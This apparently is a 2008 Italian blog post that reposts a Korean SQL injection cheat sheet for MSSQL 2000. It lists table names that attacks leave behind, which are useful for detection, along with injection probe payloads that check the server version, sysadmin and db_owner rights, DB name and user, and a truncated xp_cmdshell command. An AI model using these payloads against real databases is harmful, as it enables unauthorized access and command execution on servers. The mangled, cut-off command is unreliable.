Loading ...SQL Injection
Ciao a tutti, per la cronaca oggi abbiamo trovato un server “semi” bucato utilizzando questo simpatico script. Lo pubblico almeno spero sia di aiuto per coloro che si sono ritrovati nella stessa barca.
La fonte dell’hacking stava in Cina…Che dire… Grazie
</p>
<h6>#</h6>
<h1>SQL Injection에 의해 자주 생성되는 테이블 명</h1>
<h6>#</h6>
<p>D99<em>CMD, D99</em>REG, D99<em>Tmp, DIY</em>TEMPCOMMAND<em>TABLE, t</em>jiaozhu, Siwebtmp,
NB<em>Commander</em>Tmp, comd<em>list, Reg</em>Arrt, jiaozhu, Reg<em>Arrt, xiaopan, DIY</em>TEMPTABLE,
heige, kill<em>kk, SC</em>LOG, SC_TRAN</p>
<h6>#</h6>
<h1>CHECK</h1>
<h6>#</h6>
<p>and 1=(select @@version) //version</p>
<p>and 1=(IS_SRVROLEMEMBER('sysadmin')) // 전체 권한(sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin)</p>
<p>and 1=(IS<em>MEMBER('db</em>owner')) // 해당 DB 권한</p>
<p>;declare @a int;-- // 사용여부</p>
<p>and 0<>db_name() // DB명</p>
<p>and user>0 // USER명</p>
<h6>#</h6>
<h1>중국 해커들이 애용하는 공격패턴</h1>
<h6>#</h6>
<p>;exec master.dbo.xp_cmdshell 'echo ^<script><!--mce:0--></script></p>
<p>
Post relativi
luglio 15, 2008 in
Dark side of Brain, Hacking, MSQL2000, My Brain, Programmi, SQL injection, Sistemi Operativi, Tecniche di, Tutorials, Windows | tags: ciao a tutti, cracking, Hacking, Microsoft SQL server 2000 Exploit, MSSQL2000 exploit, sh, sono, SQL injection
